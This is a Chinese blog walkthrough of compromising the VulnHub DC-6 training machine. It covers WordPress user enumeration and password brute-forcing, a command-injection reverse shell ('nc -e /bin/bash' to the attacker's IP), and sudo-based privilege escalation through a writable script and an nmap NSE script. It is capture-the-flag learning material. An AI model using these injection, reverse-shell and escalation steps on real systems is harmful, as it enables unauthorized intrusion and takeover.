靶机:DC-6

已于 2024-08-11 19:16:43 修改
阅读量269 收藏 5
点赞数 4
分类专栏: vulnhub 文章标签: 网络安全
于 2024-08-11 19:14:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52953960/article/details/141109972
版权

一、信息收集

1、主机发现

nmap 192.168.236.0/24

2、端口扫描

nmap 192.168.236.169 -p- -A

3、目录扫描

dirsearch -u http://192.168.236.169

二、漏洞探测

访问80端口,无法访问,需要修改dns文件

添加以下内容后再次访问,得到如下页面,提示是wordpress

192.168.236.169 wordy

用whatweb查看一下具体信息

whatweb -v http://192.168.236.169

可知是word press和apache搭建的网站,用wpscan来扫描一下用户

wpscan --url http://wordy/ --enumerate u

发现以下用户

admin graham mark sarah jens

将其保存下来,以便后续爆破

官网提示

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

爆破账号密码

wpscan --url http://wordy/ -U usernames.txt -P passwords.txt

mark:helpdesk01

登录后台

http://wordy/wp-admin/

侧边栏里面有个activity monitor插件, 去漏洞库搜一下这个插件是否有漏洞

WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection - PHP webapps Exploit

三、GetShell

漏洞利用地址

http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools

命令注入,打开bp进行抓包,在ip那一栏填上一个网址,点击lookup

拼接如下命令

baidu.com | nc -e /bin/bash 192.168.236.137 4444

kali监听

nc -lvvp 4444

反弹回shell

python开启交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

在以下目录中,发现提示信息

cd /home/mark/stuff

ssh登录

graham:GSo7isUM1D4

ssh graham@192.168.236.169

四、提权

查看当前用户可执行的操作

sudo -l

发现可操作/home/jens/backups.sh,打开发现是一个解压的脚本

cat /home/jens/backups.sh

向这个脚本写入命令,让jens这个用户来执行

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

已经切换到jens用户,查看这个用户可以执行的命令

看到一个nmap,需要nmap打开一个shell即可获得root权限

nmap中执行shell方法

echo "os.execute('/bin/bash')">/tmp/shell.nse
sudo nmap --script=/tmp/shell.nse

至此成功提权,当前shell不显示命令,需要盲打

查看flag

cd /root
cat theflag.txt

花椒椒椒
关注
专栏目录
Vulnhub靶机:DC-6渗透详细过程
IerkeU的博客
03-12 2809
DC-6 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-6,315/ DC-6是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场需要具备初中级的渗透测试技巧,这并不是一个很困难的挑战,因此对初学者来说应该很友好,你的最终目标是放在root目录下的flag。 并且,官方给了一个线索:cat /usr/share/wordlists/rockyou.
DC靶机系列:DC-8
Ays.Ie的博客
02-28 282
本篇文章为DC系列第8个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
DC靶机系列:DC-6
Ays.Ie的博客
02-28 623
本篇文章为DC系列第6个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
DC靶机系列:DC-7
Ays.Ie的博客
02-28 318
本篇文章为DC系列第7个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
vulnhub靶机dc-6
waitagirl的博客
03-21 402
vulnhub靶机dc-6
Vulnhub靶机:DC-1渗透详细过程
菜鸟学渗透
04-01 798
Vulnhub靶机:DC-1渗透详细过程
Vulnhub靶机:DC-4渗透详细过程
菜鸟学渗透
04-29 415
Vulnhub靶机:DC-4渗透详细过程
DC靶机系列:DC-5
Ays.Ie的博客
02-27 437
本篇文章为DC系列第5个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
vulnhub靶机DC-1
Keepb1ue的博客
09-28 2101
文章目录靶机配置说明:靶机环境配置:靶机渗透开始:确定目标ip:端口扫描:常规扫描下目录:msf漏洞利用:切换到交互式shell:获取敏感信息:重置管理员密码:添加管理员用户:suid提权: 靶机配置说明: 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机DC1 (VirtualBox) IP:192.168.56.110 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中有详细的靶机说明,而DC-1需要寻找的flag总数为
Vulnhub靶机:DC-9渗透详细过程(DC系列完结)
IerkeU的博客
03-28 3802
信息收集 nmap -A -sV -p- -T4 192.168.132.156 目前发现只开放80端口,去web页面搜索一下 有一处后台登陆、一处搜索处 在搜索处1' or 1=1#页面返回正常,1' or 1=2#报错,BP抓包发现是POST 输出文件:sql进入kali一把梭 SQLMAP sqlmap -r sql --dbs --dump sqlmap -r sql -D users -T UserDetails -C id,username,password --dump 将admin
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2526
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3686
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3044
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8491
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
灰色GM(1,1)模型及其在电力负荷预测中的应用附Matlab代码.rar
10-07
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
基于Java的华奥汽车销售集团网.zip
10-07
基于Java的华奥汽车销售集团网.zip
探索 GRU:深度学习中门控循环单元的魅力(包含详细的完整的程序和数据)
最新发布
10-07
内容概要:本文首先介绍了GRU的基础概念及其工作原理,并着重讨论了其相对于LSTM的优势以及双向GRU的特点;之后,使用生成的正弦波形数据作为训练样本,详细讲解并提供了一段完整的实现GRU的时间序列预测案例,包括数据生成、准备、GRU模型构建与训练的具体步骤。 适用人群:具有一定编程经验并且想要掌握使用GRU完成时间序列数据分析的机器学习开发者或研究人员。 使用场景及目标:学习使用PyTorch开发工具建立基于GRU的模型,对如股市涨跌趋势预测或其他连续数值变化趋势预测等时序问题进行建模,更好地把握长期和短期的趋势。 阅读提示:为了确保理解和实践过程的连贯性,建议按文中顺序逐步实施各环节。尤其关注超参数调整以及过拟合预防方面的技巧和方法。此外,尝试拓展模型应用范围至更多样的时间和序列任务,以促进自己的技能进步和技术深化。
代码案例-仪表日置DM7275
10-07
代码案例演示仪表工具一般情况(返回单个值)
VulnHub入门教程:DC-1靶场攻破指南
"DC-1 是一个专门为渗透测试学习设计的漏洞靶场,由 ins1ght 作者提供,适合初级者。靶机于2019年2月28日发布,包含五个旗标,最终目标是找到并读取 root 用户主目录中的旗标,可能需要具备 Linux 技能、熟悉 Linux ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值